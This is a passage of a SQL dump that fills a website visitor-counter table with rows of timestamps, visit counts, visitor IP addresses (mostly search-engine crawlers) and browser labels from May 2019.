,'chrome'),(422035,1558538948,1,1,0,0,'141.8.142.103','other'),(422036,1558539657,1,1,0,0,'180.76.15.143','other'),(422037,1558539857,1,1,0,0,'91.196.178.26','chrome'),(422038,1558539980,1,1,0,0,'207.46.13.48','other'),(422039,1558541647,1,1,0,0,'66.249.64.29','chrome'),(422040,1558541766,1,1,0,0,'66.249.64.30','chrome'),(422041,1558541787,1,1,0,0,'207.46.13.156','other'),(422042,1558542149,1,1,0,0,'8.29.198.27','other'),(422043,1558542294,1,1,0,0,'8.29.198.25','other'),(422044,1558542956,1,1,0,0,'141.8.142.103','other'),(422045,1558543614,1,1,0,0,'207.46.13.156','other'),(422046,1558544571,1,1,0,0,'66.249.64.60','chrome'),(422047,1558546309,1,1,0,0,'66.249.64.30','chrome'),(422048,1558547193,2,2,0,0,'207.46.13.48','other'),(422049,1558547336,22,22,0,0,'148.251.49.107','other'),(422050,1558547393,1,1,0,0,'95.108.213.4','other'),(422051,1558548230,1,1,0,0,'66.249.64.58','chrome'),(422052,1558548560,1,1,0,0,'66.249.64.31','chrome'),(422053,1558548745,1,1,0,0,'5.45.207.19','other'),(422054,1558549069,1,1,0,0,'213.180.203.23','other'),(422055,1558549653,1,1,0,0,'66.249.64.29','chrome'),(422056,1558549747,1,1,0,0,'213.136.92.122','other'),(422057,1558550078,1,1,0,0,'207.46.13.48','other'),(422058,1558550169,1,1,0,0,'207.46.13.52','other'),(422059,1558551592,2,2,0,0,'66.249.64.31','chrome'),(422060,1558551651,1,1,0,0,'207.46.13.48','other'),(422061,1558551854,1,1,0,0,'37.9.113.148','other'),(422062,1558551949,1,1,0,0,'5.9.155.37','other'),(422063,1558551966,2,2,0,0,'157.55.39.121','other'),(422064,1558552019,1,1,0,0,'213.180.203.17','other'),(422065,1558552127,1,1,0,0,'5.45.207.79','other'),(422066,1558552549,1,1,0,0,'207.46.13.97','other'),(422067,1558552806,1,1,0,0,'92.113.194.158','chrome'),(422068,1558553011,1,1,0,0,'8.29.198.27','other'),(422069,1558553067,1,1,0,0,'157.55.39.184','other'),(422070,1558553149,1,1,0,0,'8.29.198.25','other'),(422071,1558553511,1,1,0,0,'66.249.64.31','chrome'),(422072,1558553735,1,1,0,0,'66.249.64.30','chrome'),(422073,1558554200,2,2,0,0,'157.55.39.184','other'),(422074,1558555220,24,24,0,0,'95.216.2.253','other'),(422075,1558555242,3,3,0,0,'66.249.64.31','chrome'),(422076,1558555719,1,1,0,0,'157.55.39.184','other'),(422077,1558555905,2,2,0,0,'66.249.64.30','chrome'),(422078,1558556048,1,1,0,0,'54.219.159.95','chrome'),(422079,1558556134,1,1,0,0,'178.154.244.11','other'),(422080,1558556887,1,1,0,0,'157.55.39.72','other'),(422081,1558556926,2,2,0,0,'66.249.64.29','chrome'),(422082,1558558818,1,1,0,0,'157.55.39.72','other'),(422083,1558559217,1,1,0,0,'66.249.64.62','chrome'),(422084,1558559242,1,1,0,0,'66.249.64.30','chrome'),(422085,1558559511,1,1,0,0,'178.154.244.11','other'),(422086,1558559545,1,1,0,0,'5.45.207.79','other'),(422087,1558560332,1,1,0,0,'157.55.39.72','other'),(422088,1558560383,2,2,0,0,'66.249.64.29','chrome'),(422089,1558561515,1,1,0,0,'66.249.64.30','chrome'),(422090,1558562536,2,2,0,0,'66.249.64.30','chrome'),(422091,1558562593,1,1,0,0,'66.249.64.31','chrome'),(422092,1558562760,1,1,0,0,'87.250.224.47','other'),(422093,1558563136,1,1,0,0,'40.77.167.165','other'),(422094,1558563751,1,1,0,0,'5.45.207.19','other'),(422095,1558563857,1,1,0,0,'157.55.39.4','other'),(422096,1558563877,2,2,0,0,'8.29.198.27','other'),(422097,1558563959,1,1,0,0,'66.249.64.62','chrome'),(422098,1558565258,1,1,0,0,'207.46.13.173','other'),(422099,1558565506,1,1,0,0,'13.66.139.0','other'),(422100,1558565576,1,1,0,0,'207.46.13.172','other'),(422101,1558565942,1,1,0,0,'66.249.64.31','chrome'),(422102,1558567835,1,1,0,0,'66.249.64.30','chrome'),(422103,1558568211,1,1,0,0,'66.249.64.29','chrome'),(422104,1558568926,1,1,0,0,'5.45.207.79','other'),(422105,1558569296,1,1,0,0,'66.249.64.60','chrome'),(422106,1558571302,1,1,0,0,'207.46.13.17','other'),(422107,1558571797,1,1,0,0,'66.249.64.58','chrome'),(422108,1558572990,1,1,0,0,'207.46.13.153','other'),(422109,1558574636,1,1,0,0,'207.46.13.63','other'),(422110,1558574688,1,1,0,0,'207.46.13.199','other'),(422111,1558574727,2,2,0,0,'8.29.198.27','other'),(422112,1558575158,1,1,0,0,'207.46.13.153','other'),(422113,1558575259,1,1,0,0,'141.8.142.65','other'),(422114,1558575265,1,1,0,0,'141.8.142.108','other'),(422115,1558575426,1,1,0,0,'95.108.181.83','other'),(422116,1558575565,2,2,0,0,'66.249.64.30','chrome'),(422117,1558577099,1,1,0,0,'207.46.13.153','other'),(422118,1558577152,1,1,0,0,'87.250.224.47','other'),(422119,1558577157,1,1,0,0,'66.249.64.29','chrome'),(422120,1558578140,2,2,0,0,'207.46.13.198','other'),(422121,1558578188,1,1,0,0,'207.46.13.153','other'),(422122,1558578513,1,1,0,0,'207.46.13.199','other'),(422123,1558578611,1,1,0,0,'66.249.64.30','chrome'),(422124,1558579056,1,1,0,0,'178.154.244.11','other'),(422125,1558579083,1,1,0,0,'13.66.139.0','other'),(422126,1558579672,1,1,0,0,'207.46.13.153','other'),(422127,1558580164,1,1,0,0,'66.249.64.30','chrome'),(422128,1558580557,1,1,0,0,'66.249.64.60','chrome'),(422129,1558582271,1,1,0,0,'207.46.13.112','other'),(422130,1558582765,1,1,0,0,'91.209.11.236','other'),(422131,1558582899,1,1,0,0,'46.211.100.93','chrome'),(422132,1558583037,1,1,0,0,'157.55.39.176','other'),(422133,1558583981,1,1,0,0,'66.249.64.62','chrome'),(422134,1558584442,1,1,0,0,'178.154.244.11','other'),(422135,1558585044,1,1,0,0,'91.196.178.92','firefox'),(422136,1558585165,1,1,0,0,'5.45.207.19','other'),(422137,1558585169,1,1,0,0,'5.45.207.79','other'),(422138,1558585568,1,1,0,0,'8.29.198.27','other'),(422139,1558585701,1,1,0,0,'8.29.198.26','other'),(422140,1558586411,1,1,0,0,'5.45.207.79','other'),(422141,1558586778,1,1,0,0,'157.55.39.176','other'),(422142,1558587529,1,1,0,0,'66.249.64.30','chrome'),(422143,1558587689,1,1,0,0,'66.249.64.31','chrome'),(422144,1558587993,1,1,0,0,'157.55.39.176','other'),(422145,1558588464,1,1,0,0,'193.138.1.61','other'),(422146,1558588530,1,1,0,0,'89.234.157.254','other'),(422147,1558588847,1,1,0,0,'66.249.64.31','chrome'),(422148,1558589239,1,1,0,0,'157.55.39.205','other'),(422149,1558589600,1,1,0,0,'91.196.178.163','chrome'),(422150,1558590076,3,3,0,0,'66.249.64.29','chrome'),(422151,1558590711,1,1,0,0,'130.180.211.200','firefox'),(422152,1558590825,2,2,0,0,'66.249.64.30','chrome'),(422153,1558591652,1,1,0,0,'66.249.64.58','chrome'),(422154,1558592222,1,1,0,0,'66.249.64.60','chrome'),(422155,1558592229,11,11,0,0,'34.227.118.221','chrome'),(422156,1558592276,10,10,0,0,'34.227.118.221','firefox'),(422157,1558592282,2,2,0,0,'35.162.159.222','chrome'),(422158,1558592390,1,1,0,0,'34.227.118.221','other'),(422159,1558592413,2,2,0,0,'66.249.64.31','chrome'),(422160,1558592806,1,1,0,0,'66.249.64.29','chrome'),(422161,1558592880,2,2,0,0,'207.46.13.215','other'),(422162,1558594023,1,1,0,0,'207.46.13.6','other'),(422163,1558594989,1,1,0,0,'95.108.213.4','other'),(422164,1558595134,1,1,0,0,'66.249.64.58','chrome'),(422165,1558595251,1,1,0,0,'157.55.39.147','other'),(422166,1558595552,1,1,0,0,'5.45.207.19','other'),(422167,1558595658,1,1,0,0,'207.46.13.215','other'),(422168,1558595945,1,1,0,0,'66.249.64.31','chrome'),(422169,1558596126,1,1,0,0,'66.249.64.30','chrome'),(422170,1558596133,2,2,0,0,'66.249.64.29','chrome'),(422171,1558596414,2,2,0,0,'8.29.198.25','other'),(422172,1558596418,1,1,0,0,'178.154.244.11','other'),(422173,1558596745,1,1,0,0,'89.252.21.52','other'),(422174,1558597253,1,1,0,0,'13.66.139.0','other'),(422175,1558597504,1,1,0,0,'157.55.39.205','other'),(422176,1558598482,1,1,0,0,'91.196.178.89','chrome'),(422177,1558598972,2,2,0,0,'207.46.13.210','other'),(422178,1558599214,1,1,0,0,'95.108.213.4','other'),(422179,1558599544,1,1,0,0,'66.249.64.58','chrome'),(422180,1558600229,1,1,0,0,'157.55.39.223','other'),(422181,1558601050,1,1,0,0,'157.55.39.147','other'),(422182,1558601134,1,1,0,0,'207.46.13.176','other'),(422183,1558601476,2,2,0,0,'66.249.64.29','chrome'),(422184,1558601567,1,1,0,0,'66.249.64.31','chrome'),(422185,1558602492,3,3,0,0,'157.55.39.147','other'),(422186,1558602576,1,1,0,0,'66.249.64.60','chrome'),(422187,1558602889,1,1,0,0,'178.154.244.11','other'),(422188,1558602965,1,1,0,0,'91.196.178.89','chrome'),(422189,1558603237,1,1,0,0,'141.8.142.103','other'),(422190,1558603272,1,1,0,0,'5.45.207.79','other'),(422191,1558603846,1,1,0,0,'95.135.241.105','chrome'),(422192,1558603882,1,1,0,0,'91.196.178.34','chrome'),(422193,1558604106,1,1,0,0,'104.148.64.26','chrome'),(422194,1558604217,1,1,0,0,'109.201.152.24','other'),(422195,1558604424,1,1,0,0,'180.76.15.17','other'),(422196,1558604468,2,2,0,0,'66.249.64.31','chrome'),(422197,1558604514,1,1,0,0,'66.249.64.29','chrome'),(422198,1558604588,1,1,0,0,'66.249.64.38','chrome'),(422199,1558605334,1,1,0,0,'37.9.113.20','other'),(422200,1558605717,1,1,0,0,'109.74.154.72','chrome'),(422201,1558606335,1,1,0,0,'66.249.64.29','chrome'),(422202,1558606345,2,2,0,0,'40.77.167.204','other'),(422203,1558606423,1,1,0,0,'180.76.15.158','other'),(422204,1558606749,1,1,0,0,'87.250.224.65','other'),(422205,1558607260,1,1,0,0,'8.29.198.27','other'),(422206,1558607391,1,1,0,0,'8.29.198.25','other'),(422207,1558607411,1,1,0,0,'207.46.13.100','other'),(422208,1558607524,1,1,0,0,'5.39.49.212','firefox'),(422209,1558607962,1,1,0,0,'5.45.207.19','other'),(422210,1558608424,1,1,0,0,'180.76.15.151','other'),(422211,1558608426,1,1,0,0,'91.202.160.212','chrome'),(422212,1558608801,1,1,0,0,'157.55.39.147','other'),(422213,1558608836,1,1,0,0,'66.249.64.29','chrome'),(422214,1558608859,1,1,0,0,'66.249.64.31','chrome'),(422215,1558608930,3,3,0,0,'34.66.141.212','chrome'),(422216,1558608983,3,3,0,0,'35.202.219.32','chrome'),(422217,1558609004,3,3,0,0,'35.224.117.101','chrome'),(422218,1558609016,2,2,0,0,'35.238.186.152','chrome'),(422220,1558609027,2,2,0,0,'35.238.182.159','chrome'),(422222,1558609036,1,1,0,0,'66.249.64.30','chrome'),(422223,1558609041,2,2,0,0,'35.188.101.54','chrome'),(422225,1558609497,1,1,0,0,'207.46.13.100','other'),(422226,1558610783,1,1,0,0,'91.196.178.89','chrome'),(422227,1558610911,1,1,0,0,'178.154.244.11','other'),(422228,1558611038,1,1,0,0,'5.45.207.19','other'),(422229,1558611207,2,2,0,0,'66.249.64.60','chrome'),(422230,1558611369,1,1,0,0,'157.55.39.172','other'),(422231,1558611697,1,1,0,0,'66.249.64.30','chrome'),(422232,1558612192,1,1,0,0,'91.196.178.189','chrome'),(422233,1558613153,1,1,0,0,'195.60.201.35','chrome'),(422234,1558613288,2,2,0,0,'66.249.64.31','chrome'),(422235,1558613597,1,1,0,0,'66.249.64.30','chrome'),(422236,1558613748,1,1,0,0,'157.55.39.172','other'),(422237,1558613905,1,1,0,0,'193.106.30.98','chrome'),(422238,1558614306,1,1,0,0,'178.154.244.65','other'),(422239,1558614331,1,1,0,0,'178.154.171.27','other'),(422240,1558614442,1,1,0,0,'95.108.181.75','other'),(422241,1558615286,1,1,0,0,'91.196.178.89','chrome'),(422242,1558615516,1,1,0,0,'207.46.13.250','other'),(422243,1558615628,1,1,0,0,'66.249.64.30','chrome'),(422244,1558615649,1,1,0,0,'157.55.39.172','other'),(422245,1558615656,1,1,0,0,'40.77.167.18','other'),(422246,1558615807,1,1,0,0,'62.210.83.78','firefox'),(422247,1558615844,2,2,0,0,'66.249.64.29','chrome'),(422248,1558616332,1,1,0,0,'13.52.98.205','chrome'),(422249,1558616490,1,1,0,0,'141.8.142.81','other'),(422250,1558616955,1,1,0,0,'157.55.39.8','other'),(422251,1558617845,1,1,0,0,'60.191.38.77','firefox'),(422252,1558617870,2,2,0,0,'66.249.64.30','chrome'),(422253,1558618118,1,1,0,0,'8.29.198.27','other'),(422254,1558618263,1,1,0,0,'8.29.198.25','other'),(422255,1558618392,1,1,0,0,'66.249.64.60','chrome'),(422256,1558618621,1,1,0,0,'178.154.244.11','other'),(422257,1558618711,1,1,0,0,'66.249.64.29','chrome'),(422258,1558618775,1,1,0,0,'91.196.178.161','chrome'),(422259,1558619614,1,1,0,0,'40.77.167.18','other'),(422260,1558619823,1,1,0,0,'66.249.64.30','chrome'),(422261,1558620297,1,1,0,0,'207.46.13.100','other'),(422262,1558620611,1,1,0,0,'91.196.178.161','chrome'),(422263,1558621209,1,1,0,0,'5.45.207.19','other'),(422264,1558621463,2,2,0,0,'5.45.207.79','other'),(422265,1558621662,1,1,0,0,'141.8.142.103','other'),(422266,1558622066,1,1,0,0,'66.249.64.29','chrome'),(422267,1558622170,1,1,0,0,'66.249.64.58','chrome'),(422268,1558622713,1,1,0,0,'178.154.244.11','other'),(422269,1558623773,1,1,0,0,'51.77.52.160','chrome'),(422270,1558623850,1,1,0,0,'66.249.64.31','chrome'),(422271,1558624613,1,1,0,0,'40.77.167.28','other'),(422272,1558624850,1,1,0,0,'141.8.142.103','other'),(422273,1558624880,2,2,0,0,'141.8.142.81','other'),(422274,1558626940,5,5,0,0,'40.77.167.28','other'),(422275,1558626949,7,7,0,0,'207.46.13.100','other'),(422276,1558626957,7,7,0,0,'157.55.39.167','other'),(422277,1558626964,5,5,0,0,'157.55.39.8','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (422278,1558627937,1,1,0,0,'157.55.39.167','other'),(422279,1558628234,2,2,0,0,'157.55.39.8','other'),(422280,1558628395,1,1,0,0,'141.8.142.81','other'),(422281,1558628442,1,1,0,0,'66.249.64.30','chrome'),(422282,1558628976,1,1,0,0,'8.29.198.27','other'),(422283,1558629124,1,1,0,0,'8.29.198.25','other'),(422284,1558630475,1,1,0,0,'40.77.167.28','other'),(422285,1558632308,1,1,0,0,'40.77.167.28','other'),(422286,1558632378,1,1,0,0,'87.250.224.64','other'),(422287,1558632402,1,1,0,0,'178.154.244.11','other'),(422288,1558632455,1,1,0,0,'157.55.39.167','other'),(422289,1558637220,1,1,0,0,'46.211.125.91','chrome'),(422290,1558637445,1,1,0,0,'157.55.39.167','other'),(422291,1558637998,1,1,0,0,'66.249.64.31','chrome'),(422292,1558638391,1,1,0,0,'66.249.64.58','chrome'),(422293,1558639838,1,1,0,0,'8.29.198.26','other'),(422294,1558639975,1,1,0,0,'8.29.198.27','other'),(422295,1558640538,1,1,0,0,'66.249.64.30','chrome'),(422296,1558640871,1,1,0,0,'193.106.30.98','chrome'),(422297,1558641741,1,1,0,0,'91.196.178.186','chrome'),(422298,1558641854,1,1,0,0,'66.249.64.58','chrome'),(422299,1558641876,1,1,0,0,'66.249.64.29','chrome'),(422300,1558641931,1,1,0,0,'66.249.64.31','chrome'),(422301,1558644072,1,1,0,0,'66.249.64.29','chrome'),(422302,1558645097,1,1,0,0,'66.249.64.31','chrome'),(422303,1558645658,2,2,0,0,'157.55.39.167','other'),(422304,1558647009,1,1,0,0,'87.250.224.47','other'),(422305,1558647173,1,1,0,0,'95.108.181.75','other'),(422306,1558647524,2,2,0,0,'207.46.13.179','other'),(422307,1558647691,1,1,0,0,'66.249.64.60','chrome'),(422308,1558648218,1,1,0,0,'66.249.64.29','chrome'),(422309,1558648536,1,1,0,0,'207.46.13.179','other'),(422310,1558648550,1,1,0,0,'157.55.39.150','other'),(422311,1558648871,1,1,0,0,'46.166.137.202','other'),(422312,1558649865,1,1,0,0,'176.36.21.189','chrome'),(422313,1558649879,1,1,0,0,'66.249.64.29','chrome'),(422314,1558649895,1,1,0,0,'40.77.167.208','other'),(422315,1558650685,1,1,0,0,'8.29.198.25','other'),(422316,1558650773,1,1,0,0,'207.46.13.189','other'),(422317,1558650840,1,1,0,0,'8.29.198.26','other'),(422318,1558652115,1,1,0,0,'37.9.113.148','other'),(422319,1558652374,1,1,0,0,'5.45.207.19','other'),(422320,1558652995,1,1,0,0,'66.249.64.29','chrome'),(422321,1558654171,1,1,0,0,'178.154.171.27','other'),(422322,1558654328,1,1,0,0,'157.55.39.81','other'),(422323,1558654511,1,1,0,0,'66.249.64.30','chrome'),(422324,1558654774,2,2,0,0,'66.249.64.29','chrome'),(422325,1558654984,1,1,0,0,'66.249.64.62','chrome'),(422326,1558655133,1,1,0,0,'66.249.64.58','chrome'),(422327,1558655385,1,1,0,0,'207.46.13.189','other'),(422328,1558655422,1,1,0,0,'66.249.64.30','chrome'),(422329,1558656021,2,2,0,0,'157.55.39.81','other'),(422330,1558656049,2,2,0,0,'40.77.167.55','other'),(422331,1558656399,1,1,0,0,'207.46.13.189','other'),(422332,1558656566,1,1,0,0,'95.108.213.4','other'),(422333,1558656914,1,1,0,0,'5.45.207.19','other'),(422334,1558657447,1,1,0,0,'157.55.39.81','other'),(422335,1558657661,2,2,0,0,'66.249.64.31','chrome'),(422336,1558658805,1,1,0,0,'157.55.39.81','other'),(422337,1558659521,1,1,0,0,'13.66.139.0','other'),(422338,1558660016,1,1,0,0,'66.249.64.31','chrome'),(422339,1558661538,1,1,0,0,'8.29.198.26','other'),(422340,1558661652,1,1,0,0,'40.77.167.151','other'),(422341,1558661684,1,1,0,0,'8.29.198.25','other'),(422342,1558662223,1,1,0,0,'66.249.64.29','chrome'),(422343,1558662855,1,1,0,0,'40.77.167.151','other'),(422344,1558663091,1,1,0,0,'207.46.13.190','other'),(422345,1558664089,2,2,0,0,'66.249.64.31','chrome'),(422346,1558665245,2,2,0,0,'66.249.64.29','chrome'),(422347,1558665316,1,1,0,0,'180.76.15.9','other'),(422348,1558665334,1,1,0,0,'87.250.224.64','other'),(422349,1558665342,1,1,0,0,'141.8.142.191','other'),(422350,1558665570,1,1,0,0,'5.45.207.19','other'),(422351,1558665586,1,1,0,0,'87.250.224.65','other'),(422352,1558665678,1,1,0,0,'40.77.167.162','other'),(422353,1558665734,1,1,0,0,'141.8.142.103','other'),(422354,1558665880,1,1,0,0,'178.154.244.11','other'),(422355,1558665999,1,1,0,0,'66.249.64.30','chrome'),(422356,1558666297,1,1,0,0,'87.250.224.107','other'),(422357,1558666935,2,2,0,0,'66.249.64.31','chrome'),(422358,1558667911,2,2,0,0,'66.249.64.30','chrome'),(422359,1558668394,1,1,0,0,'207.46.13.173','other'),(422360,1558669390,1,1,0,0,'46.211.135.117','chrome'),(422361,1558669986,1,1,0,0,'66.249.64.62','chrome'),(422362,1558670151,1,1,0,0,'193.194.124.167','chrome'),(422363,1558670728,1,1,0,0,'66.249.64.32','chrome'),(422364,1558671429,1,1,0,0,'66.249.64.62','chrome'),(422365,1558671721,1,1,0,0,'66.249.64.31','chrome'),(422366,1558672398,2,2,0,0,'8.29.198.26','other'),(422367,1558672454,1,1,0,0,'40.77.167.68','other'),(422368,1558672525,1,1,0,0,'40.77.167.23','other'),(422369,1558672827,1,1,0,0,'40.77.167.63','other'),(422370,1558674602,2,2,0,0,'34.213.215.12','chrome'),(422371,1558674744,2,2,0,0,'66.249.64.29','chrome'),(422372,1558674753,2,2,0,0,'66.249.64.30','chrome'),(422373,1558674926,1,1,0,0,'66.249.64.62','chrome'),(422374,1558675045,1,1,0,0,'40.77.167.23','other'),(422375,1558675059,1,1,0,0,'91.196.178.89','chrome'),(422376,1558676027,1,1,0,0,'5.45.207.19','other'),(422377,1558676155,1,1,0,0,'40.77.167.23','other'),(422378,1558676324,1,1,0,0,'40.77.167.63','other'),(422379,1558676621,1,1,0,0,'66.249.64.58','chrome'),(422380,1558676816,1,1,0,0,'141.8.142.103','other'),(422381,1558676930,1,1,0,0,'95.108.213.4','other'),(422382,1558677404,1,1,0,0,'66.249.64.31','chrome'),(422383,1558677533,3,3,0,0,'40.77.167.23','other'),(422384,1558677551,6,6,0,0,'40.77.167.76','other'),(422385,1558677825,3,3,0,0,'66.249.64.30','chrome'),(422386,1558677899,4,4,0,0,'40.77.167.63','other'),(422387,1558678213,3,3,0,0,'40.77.167.144','other'),(422388,1558678281,1,1,0,0,'180.76.15.158','other'),(422389,1558678350,1,1,0,0,'66.249.64.31','chrome'),(422390,1558678824,1,1,0,0,'66.249.64.29','chrome'),(422391,1558679163,2,2,0,0,'66.249.64.30','chrome'),(422392,1558679326,1,1,0,0,'66.249.64.58','chrome'),(422393,1558679875,2,2,0,0,'66.249.64.31','chrome'),(422394,1558680174,1,1,0,0,'40.77.167.63','other'),(422395,1558680576,1,1,0,0,'66.249.64.62','chrome'),(422396,1558680693,1,1,0,0,'66.249.64.29','chrome'),(422397,1558681226,1,1,0,0,'37.9.113.20','other'),(422398,1558681414,1,1,0,0,'213.180.203.53','other'),(422399,1558681751,1,1,0,0,'95.108.213.4','other'),(422400,1558681941,1,1,0,0,'207.46.13.149','other'),(422401,1558682502,1,1,0,0,'91.196.178.89','chrome'),(422402,1558682505,1,1,0,0,'40.77.167.76','other'),(422403,1558683201,2,2,0,0,'207.46.13.149','other'),(422404,1558683251,2,2,0,0,'8.29.198.27','other'),(422405,1558683482,1,1,0,0,'141.8.142.65','other'),(422406,1558683813,1,1,0,0,'40.77.167.76','other'),(422407,1558683896,1,1,0,0,'40.77.167.68','other'),(422408,1558684738,1,1,0,0,'91.196.178.89','chrome'),(422409,1558684762,2,2,0,0,'66.249.64.30','chrome'),(422410,1558684978,1,1,0,0,'66.249.64.58','chrome'),(422411,1558685159,2,2,0,0,'66.249.64.29','chrome'),(422412,1558685316,1,1,0,0,'91.196.178.43','chrome'),(422413,1558686888,1,1,0,0,'40.77.167.10','other'),(422414,1558686988,1,1,0,0,'207.46.13.149','other'),(422415,1558687350,1,1,0,0,'46.201.123.174','chrome'),(422416,1558687450,1,1,0,0,'66.249.66.220','chrome'),(422417,1558687836,1,1,0,0,'95.108.181.75','other'),(422418,1558688501,1,1,0,0,'46.201.123.174','chrome'),(422419,1558688581,2,2,0,0,'66.249.66.222','chrome'),(422420,1558690906,1,1,0,0,'207.46.13.149','other'),(422421,1558691196,1,1,0,0,'66.249.66.132','chrome'),(422422,1558691699,1,1,0,0,'207.46.13.165','other'),(422423,1558692409,1,1,0,0,'66.249.66.128','chrome'),(422424,1558692690,1,1,0,0,'66.249.66.220','chrome'),(422425,1558693306,1,1,0,0,'109.74.154.72','chrome'),(422426,1558693633,1,1,0,0,'66.249.66.130','chrome'),(422427,1558694105,1,1,0,0,'8.29.198.27','other'),(422428,1558694276,1,1,0,0,'8.29.198.25','other'),(422429,1558694881,1,1,0,0,'31.148.168.68','chrome'),(422430,1558694955,2,2,0,0,'207.46.13.149','other'),(422431,1558695321,3,3,0,0,'35.222.133.39','chrome'),(422432,1558695348,3,3,0,0,'104.154.40.29','chrome'),(422433,1558695362,1,1,0,0,'35.192.12.244','chrome'),(422434,1558695363,4,4,0,0,'35.192.12.244','chrome'),(422435,1558695384,3,3,0,0,'146.148.68.71','chrome'),(422436,1558695397,3,3,0,0,'35.192.3.252','chrome'),(422437,1558695598,1,1,0,0,'66.249.66.218','chrome'),(422438,1558695752,1,1,0,0,'66.249.66.222','chrome'),(422439,1558695872,1,1,0,0,'66.249.66.220','chrome'),(422440,1558696363,2,2,0,0,'207.46.13.149','other'),(422441,1558696385,2,2,0,0,'40.77.167.39','other'),(422442,1558696810,1,1,0,0,'141.8.142.103','other'),(422443,1558697372,1,1,0,0,'66.249.66.218','chrome'),(422444,1558697665,1,1,0,0,'66.249.66.128','chrome'),(422445,1558697873,1,1,0,0,'66.249.66.220','chrome'),(422446,1558698403,1,1,0,0,'40.77.167.39','other'),(422447,1558698791,1,1,0,0,'66.102.9.58','chrome'),(422448,1558699543,2,2,0,0,'207.46.13.149','other'),(422449,1558699720,1,1,0,0,'95.132.41.82','firefox'),(422450,1558699733,1,1,0,0,'66.249.66.220','chrome'),(422451,1558700131,1,1,0,0,'95.108.213.4','other'),(422452,1558700343,1,1,0,0,'5.45.207.79','other'),(422453,1558700523,1,1,0,0,'109.201.154.195','other'),(422454,1558701248,1,1,0,0,'5.45.207.79','other'),(422455,1558701566,1,1,0,0,'46.211.46.173','chrome'),(422456,1558701976,2,2,0,0,'40.77.167.39','other'),(422457,1558704189,1,1,0,0,'40.77.167.39','other'),(422458,1558704878,1,1,0,0,'119.98.190.84','other'),(422459,1558704944,1,1,0,0,'8.29.198.27','other'),(422460,1558705136,1,1,0,0,'8.29.198.25','other'),(422461,1558706072,3,3,0,0,'178.154.244.11','other'),(422462,1558706297,1,1,0,0,'40.77.167.39','other'),(422463,1558706517,1,1,0,0,'141.8.142.103','other'),(422464,1558706862,1,1,0,0,'46.211.127.68','chrome'),(422465,1558707082,1,1,0,0,'141.8.142.38','other'),(422466,1558707179,1,1,0,0,'207.46.13.165','other'),(422467,1558707667,1,1,0,0,'193.106.30.98','chrome'),(422468,1558707903,1,1,0,0,'40.77.167.58','other'),(422469,1558708060,1,1,0,0,'66.249.66.218','chrome'),(422470,1558708332,1,1,0,0,'207.46.13.165','other'),(422471,1558708413,1,1,0,0,'5.45.207.19','other'),(422472,1558708587,1,1,0,0,'66.249.66.222','chrome'),(422473,1558709222,1,1,0,0,'40.77.167.58','other'),(422474,1558712164,1,1,0,0,'157.55.39.129','other'),(422475,1558712391,1,1,0,0,'66.249.66.220','chrome'),(422476,1558712517,1,1,0,0,'5.45.207.19','other'),(422477,1558712561,1,1,0,0,'91.209.11.236','other'),(422478,1558712588,1,1,0,0,'95.108.213.4','other'),(422479,1558712804,1,1,0,0,'66.249.66.218','chrome'),(422480,1558713413,1,1,0,0,'178.154.244.11','other'),(422481,1558713515,1,1,0,0,'141.8.142.103','other'),(422482,1558713517,2,2,0,0,'87.250.224.65','other'),(422483,1558713522,1,1,0,0,'95.108.181.54','other'),(422484,1558713532,1,1,0,0,'178.154.244.49','other'),(422485,1558714654,2,2,0,0,'66.249.66.218','chrome'),(422486,1558714919,1,1,0,0,'66.249.66.220','chrome'),(422487,1558715166,1,1,0,0,'66.249.66.128','chrome'),(422488,1558715234,1,1,0,0,'40.77.167.54','other'),(422489,1558715324,1,1,0,0,'40.77.167.83','other'),(422490,1558715808,2,2,0,0,'8.29.198.27','other'),(422491,1558716292,1,1,0,0,'66.249.66.222','chrome'),(422492,1558716528,1,1,0,0,'5.45.207.79','other'),(422493,1558716558,1,1,0,0,'40.77.167.83','other'),(422494,1558716754,2,2,0,0,'40.77.167.54','other'),(422495,1558716798,1,1,0,0,'157.55.39.129','other'),(422496,1558717623,1,1,0,0,'157.55.39.38','other'),(422497,1558717686,1,1,0,0,'46.211.100.60','chrome'),(422498,1558718078,1,1,0,0,'66.249.66.220','chrome'),(422499,1558719035,1,1,0,0,'66.249.66.220','chrome'),(422500,1558719271,1,1,0,0,'40.77.167.83','other'),(422501,1558719482,1,1,0,0,'66.249.66.132','chrome'),(422502,1558720532,1,1,0,0,'157.55.39.132','other'),(422503,1558720567,3,3,0,0,'157.55.39.38','other'),(422504,1558720630,1,1,0,0,'5.45.207.19','other'),(422505,1558720715,1,1,0,0,'66.249.66.222','chrome'),(422506,1558720731,1,1,0,0,'5.45.207.79','other'),(422507,1558720796,1,1,0,0,'141.8.142.103','other'),(422508,1558721728,1,1,0,0,'66.249.66.222','chrome'),(422509,1558721755,1,1,0,0,'66.249.66.128','chrome'),(422510,1558721885,1,1,0,0,'95.163.255.95','other'),(422511,1558721893,1,1,0,0,'66.249.66.220','chrome'),(422512,1558721894,1,1,0,0,'95.163.255.92','other'),(422513,1558721972,1,1,0,0,'5.45.207.79','other'),(422514,1558722064,1,1,0,0,'66.249.66.218','chrome'),(422515,1558722082,1,1,0,0,'95.163.255.96','other'),(422516,1558722368,1,1,0,0,'95.163.255.98','other'),(422517,1558723143,1,1,0,0,'207.46.13.22','other'),(422518,1558725202,1,1,0,0,'66.249.66.222','chrome'),(422519,1558725309,1,1,0,0,'40.77.167.83','other'),(422520,1558725593,1,1,0,0,'95.163.255.157','other'),(422521,1558726739,1,1,0,0,'8.29.198.27','other'),(422522,1558726955,1,1,0,0,'8.29.198.25','other'),(422523,1558727392,1,1,0,0,'66.249.66.128','chrome'),(422524,1558727539,1,1,0,0,'95.163.255.98','other'),(422525,1558727561,1,1,0,0,'5.45.207.79','other'),(422526,1558727635,1,1,0,0,'95.108.213.4','other'),(422527,1558727716,1,1,0,0,'178.154.244.11','other'),(422528,1558727853,1,1,0,0,'95.163.255.97','other'),(422529,1558728067,3,3,0,0,'5.45.207.19','other'),(422530,1558728148,1,1,0,0,'87.250.224.47','other'),(422531,1558728231,1,1,0,0,'66.249.66.222','chrome'),(422532,1558728489,1,1,0,0,'5.45.207.79','other'),(422533,1558729056,6,6,0,0,'157.55.39.38','other'),(422534,1558729067,7,7,0,0,'207.46.13.22','other'),(422535,1558729075,2,2,0,0,'40.77.167.168','other'),(422536,1558729086,7,7,0,0,'40.77.167.222','other'),(422537,1558729548,2,2,0,0,'157.55.39.118','other'),(422538,1558729723,1,1,0,0,'5.45.207.79','other'),(422539,1558729918,1,1,0,0,'66.